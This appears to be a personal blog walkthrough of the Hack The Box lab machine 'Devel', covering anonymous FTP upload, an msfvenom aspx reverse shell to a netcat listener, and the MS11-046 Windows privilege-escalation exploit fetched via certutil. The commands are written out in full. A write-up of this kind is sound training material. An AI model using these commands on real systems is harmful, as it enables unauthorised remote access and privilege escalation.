[hackthebox]Devel

devel1

nmap enumeration

nmap -A -p- -T4 -vvv -oN devel 10.10.10.5
devel2

FTP upload test

From nmap result it says ftp allows anonymous login. Now I test whether I can upload files.
devel3

I can also do directory and file listing.
devel4

Test if the files in FTP reflects the page in the web.
devel5

The iistart.htm is also available.
devel6devel7

Test if the file I upload can be displayed in the web.
I create a simple htm file which will pop up a javascript dialog, then i upload the file to the ftp.
devel8

devel10
devel9

Generate a reverse shell aspx

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.20 lport=4444 -f aspx -o devel.aspx
devel11

This file will then be uploaded to the ftp.
devel12

Get the windows shell

nc -lvnp 4444

With the browser go to http://10.10.10.5/devel.aspx to initiate the reverse connection.
devel13devel14

Understand the system and get the exploit

devel15

6.1.7600 N/A Build 7600 is the version after searching and testing a few exploits, this one works the best – https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c the condition to use this exploit is first get a valid logon which I have already done and be able to execute the exploit locally.

Also although the virtual machine is 64-bit the Windows 7 is a 32-bit version.
devel16

Compile the source code

I will be compiling the source code in linux locally then I will set up a http server with python, and I use certutil in Devel to download the compiled binary.

Cross compiler is required to compile the windows binary within linux environment.
apt install mingw-w64

I would need to compile the exploit in 32-bit binary in order to run in Devel.
i686-w64-mingw32-gcc 40564.c -o devel.exe -lws2_32

Pwn devel

Setup a http server in my kali machine
python3 -m http.server 80

Then on Devel use certutil -urlcache -f http://10.10.14.20/devel.exe C:\Users\Public\Downloads\devel.exe
devel17
devel18

devel19

From now I can get both the babis user and Administrator’s flag.
devel20

Clean up

After I have got the flags, I exit from the escalated environment to revert backt to the original user, then delete the devel.exe which I downloaded.
devel21

devel22

Afterword

Although this is an easy machine it provides good practice to try to do the hack manually, there are other solutions which use metasploit’s exploits to do the hack but I want to try to see if a manual way is possible, I also wanted to cross compile another cpp file to test if the exploit works on Devel, until next time.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s